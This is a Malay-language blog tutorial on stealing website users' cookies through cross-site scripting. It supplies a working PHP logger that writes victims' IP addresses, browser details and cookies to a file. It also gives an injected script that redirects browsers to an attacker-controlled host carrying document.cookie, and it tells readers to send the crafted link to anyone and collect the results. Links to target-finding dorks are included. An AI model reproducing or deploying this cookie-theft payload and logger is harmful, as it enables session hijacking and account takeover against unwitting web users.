Mencuri cookies orang lain dengan XSS

Assalamualaikum dan salam Sejahtera

tutorial ini adalah cara untuk mencuri biskut, atau mengambil biskut dari user yang klik pada website yang vulnerable kepada xss attack . XSS juga dikenali sebagai Cross site scripting . yang terdapat pada "web Application".Jika korang ingin menbaca dengan lebih lanjut , korang boleh rujuk pada link di bawah :

http://en.wikipedia.org/wiki/Cross-site_scripting

mari kita mulakan dengan tutorial untuk mencuri biskut .

Pertama anda perlu sediakan dua file :

• apasahaja.php
• log.txt

upload kedua-dua file tersebut kedalam webhosting .

ok . kita perlu dapatkan target . jika korang sudah dapatkan target ,korang boleh masukan code ini , untuk mengetahui sama ada target boleh di exploit atau tidak .

Code :

<script>alert("test")</script>

Ok. Mari belajar cara untuk Cuir biskut mengunakan Xss .

Pertama sekali korang masukan php code ini di dalam "apasaja.php"

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
fclose($log);
}

logData();

?>

dan save as.php .

script di atas akan merekod cookies user yang view link xss itu tadi .

Sebagai contoh , target kita adalah "http://google.com".
Jadi link yang vulnerable kepada xss adalah http://google.com/search_q=xss

Jadi yang korang perlu lakukan adalah :

Http://google.com/search_q="><script language= "JavaScript">document.location="http://yoursite.com/apasaja.php?cookie=" + document.cookie;document.location="http://google.com/"</script>

untuk mendapatkan cookies . Sila serahkan link xss korang kepada sesiapa sahaja seperti di atas ,
Sila buka log file korang , yang korang sertakan dengan apasahaja tadi ,
dan hasilnya korang akan dapat seperti dibawah :

IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://google.com/search |  

Sila fahami konsep di atas , dan ambil exploit yang telah diberikan .

Jika korang nak tahu google dork mengenai Xss korang boleh rujuk link dibawah :

http://h4ckingtutors.blogspot.com/2012/07/hacking-xss-dork-repost.html

Itu sahaja . Enjoy

Incoming search :
Apakah Itu Xss
xss cookies stealing

Artikel terkait :